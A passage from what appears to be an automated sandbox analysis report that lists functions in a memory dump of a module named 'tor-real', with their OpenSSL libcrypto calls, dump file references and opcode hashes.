                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: a454a6a258d9c4e0f30ccec724d6b4cb2db289a3cf3738227877a7834dd36b5c
                                                                            • Instruction ID: b05e4f4928fdb51a3521fb38a830ef2c29cd66cf7c36dd6174d631c77c2617a5
                                                                            • Opcode Fuzzy Hash: a454a6a258d9c4e0f30ccec724d6b4cb2db289a3cf3738227877a7834dd36b5c
                                                                            • Instruction Fuzzy Hash: 373171B4606B069FD354CF29D180A96FBE1BF88310F108A2DD8AE87B41D731B860CF94
                                                                            Function 6C094F70 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: a9092498052b6aacc36b99411b0bb5ab17a8a5bb701905b9cf4a151c7b865abf
                                                                            • Instruction ID: 825c93cefb7fcccf79887640a9ce23ce47899e203e18011832764cd3066b4b5e
                                                                            • Opcode Fuzzy Hash: a9092498052b6aacc36b99411b0bb5ab17a8a5bb701905b9cf4a151c7b865abf
                                                                            • Instruction Fuzzy Hash: 6021B372A012229FCB15DF59D490316FBE0FF80714F1E9699D86A9F705D231E884DBE0
                                                                            Function 6C0944C0 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0956A7), ref: 6C09452A
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 4702b7f446c7d0caf9f00496938ed437591c197381c0a1e6f3d845effdaec197
                                                                            • Instruction ID: 2fbeb205223999d2078c26420e90307f446c9ec3b90af42ec16dc80d1a4fcde9
                                                                            • Opcode Fuzzy Hash: 4702b7f446c7d0caf9f00496938ed437591c197381c0a1e6f3d845effdaec197
                                                                            • Instruction Fuzzy Hash: B0219F726053059BD710DFE9E5C0716FBE4FF84728F1986ADC9698BB03E271E8809B90
                                                                            Function 6C096C23 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C09A5A0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09A5BD
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096D01
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: d2b499e0634311f6d20e6498f6723c8c2d5723a27ed531b437cf715c547207ef
                                                                            • Instruction ID: 29575fe76a822cd6bf58b4b25f1d7ef4d81dc1f56cec027faf75a9753dc1f713
                                                                            • Opcode Fuzzy Hash: d2b499e0634311f6d20e6498f6723c8c2d5723a27ed531b437cf715c547207ef
                                                                            • Instruction Fuzzy Hash: 853158B86017099FC744DF1AC180655BBE0BF88608F6485AECD684F716E732A952CF95
                                                                            Function 6C09453C Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0956A7), ref: 6C09452A
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 8455846ed547c423fe16c013f690b21abd8ef2b71352031e7aedbfd1bfdb151a
                                                                            • Instruction ID: b1583bc43660d8ca03faee1b6b0c65e4dceaa601ba1d1b161ab7cd265e177eb6
                                                                            • Opcode Fuzzy Hash: 8455846ed547c423fe16c013f690b21abd8ef2b71352031e7aedbfd1bfdb151a
                                                                            • Instruction Fuzzy Hash: 01F0C2762097099BCB109ED8E1C0346F7E0EF84718F194A6DCE698BB02F372E445A791
                                                                            Function 6C0BC7D9 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC753
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock
                                                                            • String ID:
                                                                            • API String ID: 3327040364-0
                                                                            • Opcode ID: 7192fdd6c8606f5d51919ad14b2f4d52c98569829392d4846455f21d5441fd2f
                                                                            • Instruction ID: ec38d0733aa51e60237d69839ca8f6ce22d64df61c3db88434a40173c884abb9
                                                                            • Opcode Fuzzy Hash: 7192fdd6c8606f5d51919ad14b2f4d52c98569829392d4846455f21d5441fd2f
                                                                            • Instruction Fuzzy Hash: A2011970A45B018BE740EF3889807DAB7E0BF45358F544629E4ADEBA80D736E4858B92
                                                                            Function 6C0E4FA7 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0E4FC6
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0E514D
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_mallocR_put_error
                                                                            • String ID:
                                                                            • API String ID: 2513334388-0
                                                                            • Opcode ID: 0fb722bff7751c77e07a10289988199f9987f4e6158d476fd6198e0cc744f114
                                                                            • Instruction ID: ba91141d673c85ba3d13130c6a179be476afc3f49d9a076ce1bb3b3c0cd5ab97
                                                                            • Opcode Fuzzy Hash: 0fb722bff7751c77e07a10289988199f9987f4e6158d476fd6198e0cc744f114
                                                                            • Instruction Fuzzy Hash: 9A0108755483118FC7109F25C19031BB7F1BB88344F81891DE9A99B610D730E8068F92
                                                                            Function 6C0DE01B Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0DE04F
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_memdup
                                                                            • String ID:
                                                                            • API String ID: 560317026-0
                                                                            • Opcode ID: ae3ec4a0865f82f72832b928c5de5d522d5fc91e6b8bc74743c0ee699215c89e
                                                                            • Instruction ID: f02f59e468761727199c1d76a518e5c09c62e64596b908071272412fcfe74b5f
                                                                            • Opcode Fuzzy Hash: ae3ec4a0865f82f72832b928c5de5d522d5fc91e6b8bc74743c0ee699215c89e
                                                                            • Instruction Fuzzy Hash: 3901FB75A087508FD710CF19C48079AB7E0BF89714F098969EC98AB615C334A5408BD1
                                                                            Function 6C0A0E80 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0A0E9F
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9828
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9848
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9868
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9888
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E98A8
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E98C8
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E98E8
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9908
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_dup$O_zalloc
                                                                            • String ID:
                                                                            • API String ID: 3577659955-0
                                                                            • Opcode ID: 570e896b06f7324cd23181eb7f63870d1a1dce76d5502b512c681f704ec0972d
                                                                            • Instruction ID: 306a9176529ce2bfcecac7f4170b134d2fd1de83977c74c2eff42a9a2834a688
                                                                            • Opcode Fuzzy Hash: 570e896b06f7324cd23181eb7f63870d1a1dce76d5502b512c681f704ec0972d
                                                                            • Instruction Fuzzy Hash: 4CF039B01093448FE700AFB5C88131A7AE4AF44208F55889CE895DB252E778C1549B92
                                                                            Function 6C0E4974 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: dc1d95ce2f6537cae48ea33baf124cdf06d3edf3458e5e5129fab7b0594df9b6
                                                                            • Instruction ID: 7d3c46a76120d215a34dab5ac9ccc808d27d4c05ff6023c8c2e9b9f468a8c0ff
                                                                            • Opcode Fuzzy Hash: dc1d95ce2f6537cae48ea33baf124cdf06d3edf3458e5e5129fab7b0594df9b6
                                                                            • Instruction Fuzzy Hash: ECE0927A6083148FC3019F98E48065AFBE0FF89759F01886DEE889B720C375ED498F42
                                                                            Function 6C0BC7A1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC7BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock
                                                                            • String ID:
                                                                            • API String ID: 3327040364-0
                                                                            • Opcode ID: 7d9753880cfeabc3e680890034c1f31e456511c070b66d221f9af610a7ea6fff
                                                                            • Instruction ID: d8f3ab062c75d0c7e06ff25416b58c0bc59c220b528215aeefbb754ccb42b166
                                                                            • Opcode Fuzzy Hash: 7d9753880cfeabc3e680890034c1f31e456511c070b66d221f9af610a7ea6fff
                                                                            • Instruction Fuzzy Hash: 61E0EC716547018BD740AF68D4807D9B7E4BF84314F44082DE999EBA00D736A5858B51
                                                                            Function 6C0ACB24 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACB37
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBC7
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_once
                                                                            • String ID:
                                                                            • API String ID: 1403826838-0
                                                                            • Opcode ID: f839e6d9434005b49d157b3fd5b2f90b31ec6f0fe23ed0e1373ea38a3f7b8be6
                                                                            • Instruction ID: dbd95180ddc32ba607adcbed44fe2129ea16b6f1beb2d6e7b4a5f5314d079071
                                                                            • Opcode Fuzzy Hash: f839e6d9434005b49d157b3fd5b2f90b31ec6f0fe23ed0e1373ea38a3f7b8be6
                                                                            • Instruction Fuzzy Hash: 18E05B717663094BE7046BD5C95135633E0AF45784F0A811DDD515BE93C733D4428EC2
                                                                            Function 6C0BE6B8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: e325712b39aa614ea16d27714bf9cabc304abc4371964f7e52c6920583eed0e8
                                                                            • Instruction ID: e553826f128cf0df8d2fc8982844d2699e1af0237f4b26a6e8fdb8e82b1dc7f8
                                                                            • Opcode Fuzzy Hash: e325712b39aa614ea16d27714bf9cabc304abc4371964f7e52c6920583eed0e8
                                                                            • Instruction Fuzzy Hash: D4E0E5B4508300CFDB209F24C4C9B5977E0BB09304F4146A8E9985B362C735A4488B41
                                                                            Function 6C0BE844 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
